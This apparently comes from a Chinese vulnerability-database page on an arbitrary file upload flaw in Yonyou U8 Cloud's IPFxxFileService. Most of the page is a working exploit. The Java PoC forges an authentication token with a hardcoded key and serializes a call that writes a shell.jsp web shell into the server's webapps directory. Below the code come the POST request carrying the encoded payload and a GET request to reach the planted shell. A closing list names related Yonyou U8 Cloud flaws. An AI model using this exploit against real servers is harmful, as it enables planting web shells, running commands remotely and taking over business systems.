用友 U8 Cloud IPFxxFileService 任意文件上传漏洞

日期: 2025-09-18 14:08:11 | 影响软件: 用友U8 Cloud | POC: 已公开

漏洞描述

文件上传漏洞发生在应用程序允许用户上传文件的功能中，如果上传功能未能正确地验证和限制上传文件的类型和内容，攻击者可能利用此漏洞上传恶意文件，如包含可执行代码的脚本文件，从而在服务器上执行任意命令，控制或破坏系统。

PoC代码

import nc.bs.framework.common.InvocationInfo;
import nc.bs.framework.comn.NetObjectOutputStream;
import nc.bs.framework.exception.FrameworkRuntimeException;
import nc.bs.framework.server.token.MD5Util;

import java.io.*;
import java.net.HttpURLConnection;
import java.net.URL;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.security.MessageDigest;
import java.util.Base64;
import java.util.zip.ZipEntry;
import java.util.zip.ZipOutputStream;


public class ServiceDispatcherServlet {
    public static void main(String[] args) throws Exception {
        byte[] data = createData("./shell.jsp");

        String userCode = "1";
        String service = "nc.itf.uap.pfxx.IPFxxFileService";

        String method = "writeDocToXMLFile";
        Class[] classes = {byte[].class, String.class};
        Object[] params = {data, "webapps/u8c_web/34d1866c365ac0092638a075e2c13aac.jsp"};
        InvocationInfo invocationInfo = new InvocationInfo(service, method, classes, params);
        invocationInfo.setUserCode(userCode);
        invocationInfo.setToken(genToken(userCode));
        FileOutputStream fos = new FileOutputStream("./ser1.bin");
        NetObjectOutputStream.writeObject(fos, invocationInfo);

        byte[] bytes = Files.readAllBytes(Paths.get("./ser1.bin"));
        String s = Base64.getEncoder().encodeToString(bytes);
        System.out.println(s);
    }

    public static byte[] createData(String filePath) throws IOException {
        return Files.readAllBytes(Paths.get(filePath));
    }

    private static byte[] md5(byte[] key, byte[] tokens) {
        MessageDigest md = null;

        try {
            md = MessageDigest.getInstance("SHA-1");
            md.update(tokens);
            md.update(key);
            return md.digest();
        } catch (Exception var5) {
            Exception e = var5;
            throw new FrameworkRuntimeException("md5 error", e);
        }
    }

    public static String genToken(String userCode) {
        byte[] md5 = md5("ab7d823e-03ef-39c1-9947-060a0a08b931".getBytes(), userCode.getBytes());
        return MD5Util.byteToHexString(md5);
    }
}


POST /ServiceDispatcherServlet HTTP/1.1

{{base64decode(AAACPHJxiQF7uQPbFPuWMWS63hJKY0Wrr6QW0Rp3mKSWQODMh32wwokYgFxrSBJebabPcsPNLdxM0ggqZIJL/G2pXxfHvj/ahsaZ0fOq4z/MKsxrrNPo+jtCHyluJxo8WsNEVTOMSptUvg9vV+mBmbxBGqjDyTCeFv/QsLZKC2Hjcpw16TuhhjxIfHzzIJK6bFsntA5AfYiPfR6FbCx5rAjAFzy08z5Dt+O0c2XFVXmsM+ftJCiqqc0JURGGBXaNReUrio3N85Eq8O/BWsAlSBF9n5dqCWYmdvvNVSgQDnitNqzcKUJZ9kGaq38y6V2iyWSxYhqS9ptLC4pgwJ4TMIE2C7ww1Xh/CfvOMJGkfQSt2wxtb0dqSAWhi97MxuuYQZqrfzLpXaJp+vmlLVDPDhWuErgjOqmafs7r5UbzIAiw89xIc9r1rjtDqRfg8Jl/hDngEwYt/veRmZ8dRAD4A/zNtTbRFdZTUxr6j+4+s3gC9p+YtILUhQxYuN/ig1LrmlydZh2WkjGBDrDhT+ARRFpyQr5ojkM/4jaoTwppjWa3xSLrMUs5mW6N9Nk8CBe1AUVkGet0lixQ2TUlK5AeCi1TswwuLKdwQAvmva/YKp2r3S7439N6YHq0dIhMFQR+4m1nJrDjDSlO2Oo4VDI8bBT5LqgoGK+KGz5DgFtRuljnaYhZZTg1kcLJjpTCWYTcxCdkLnaPbNTC8eyXmoSN1N057khQIprPbtbM/j7fmjfQ+LAjzlE/x/RUQJbHkuLQ)}}

GET /34d1866c365ac0092638a075e2c13aac.jsp HTTP/1.1

漏洞描述

PoC代码

相关漏洞推荐

用友 U8 Cloud 文件上传绕过漏洞 无POC

用友 U8 Cloud /u8cloud/api/hrta/returnleave/callback SQL 注入漏洞 无POC

用友-U8-Cloud submit SQL注入漏洞 无POC

yonyou-u8-cloud-fileupload: 用友U8 Cloud upload任意文件上传 POC

用友U8 Cloud nc.bs.pub.querymodel.soap.QuerySoapServlet SQL 注入漏洞 无POC

用友 U8 Cloud 文件上传绕过漏洞无POC

用友 U8 Cloud /u8cloud/api/hrta/returnleave/callback SQL 注入漏洞无POC

用友-U8-Cloud submit SQL注入漏洞无POC

用友U8 Cloud nc.bs.pub.querymodel.soap.QuerySoapServlet SQL 注入漏洞无POC